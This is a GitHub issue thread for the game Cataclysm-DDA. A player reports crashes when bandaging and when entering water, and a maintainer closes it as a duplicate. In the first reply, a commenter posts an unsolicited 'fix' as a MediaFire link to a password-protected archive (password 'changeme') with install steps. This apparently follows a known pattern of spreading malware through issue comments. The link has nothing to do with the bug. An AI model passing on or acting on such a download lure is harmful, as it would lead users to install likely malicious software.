### ISSUE TITLE
Departure when entering the water

### ISSUE THREAD

**Issue by i0985** [CleverRaven/Cataclysm-DDA#76126] opened 2024-09-01 22:24 UTC
### Describe the bug

Crash games I have a problem, do you all have today's latest experimental build of the game crashes when using some medications (gauze definitely crashes sometimes) and when the character enters the water? Or is it just me and just the save will soon become unplayable (I've been putting the save for about six months on all experimental builds).I attach the first photo of the departure due to the gauze bandage, the second photo of the departure due to entering the water

![изображение_2024-09-02_010814301](https://github.com/user-attachments/assets/e75b482c-03c4-494a-afdd-637b61deffc8)
![Скриншот 02-09-2024 010520](https://github.com/user-attachments/assets/f41fd33f-b74c-4718-bf20-a858943750f2)

### Attach save file

[Нориас-trimmed.tar.gz](https://github.com/user-attachments/files/16830673/-trimmed.tar.gz)

### Steps to reproduce

It just crashes when the character enters the water, there is not even a character moving into the water

### Expected behavior

Passage of water in Thailand

### Screenshots

![Скриншот 02-09-2024 010520](https://github.com/user-attachments/assets/9f1a72d0-cae2-49bc-8def-7dddb74b9bbf)
![image](https://github.com/user-attachments/assets/6a5c9705-fcae-49ae-bb98-5813871f9174)

### Versions and configuration

- OS: Windows
    - OS Version: 10.0.19045.4780 (22H2)
- Game Version: 746a170 [64-bit]
- Graphics Version: Tiles
- Game Language: Русский <color_dark_gray>(91,4%)</color> [ru]
- Mods loaded: [
    Тёмные Дни Впереди [dda],
    Отключить потребности у НПС [no_npc_food],
    Портальные штормы игнорируют НПС [personal_portal_storms],
    Медленный рост фунгалоидов [no_fungal_growth]
]

**Comment by goncastrum** [comment] 2024-09-01 22:28
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by RenechCDDA** [comment] 2024-09-02 02:04
Duplicate of #76110

**Closed by RenechCDDA** 2024-09-02 02:04 UTC
Labels: (S1 - Need confirmation)
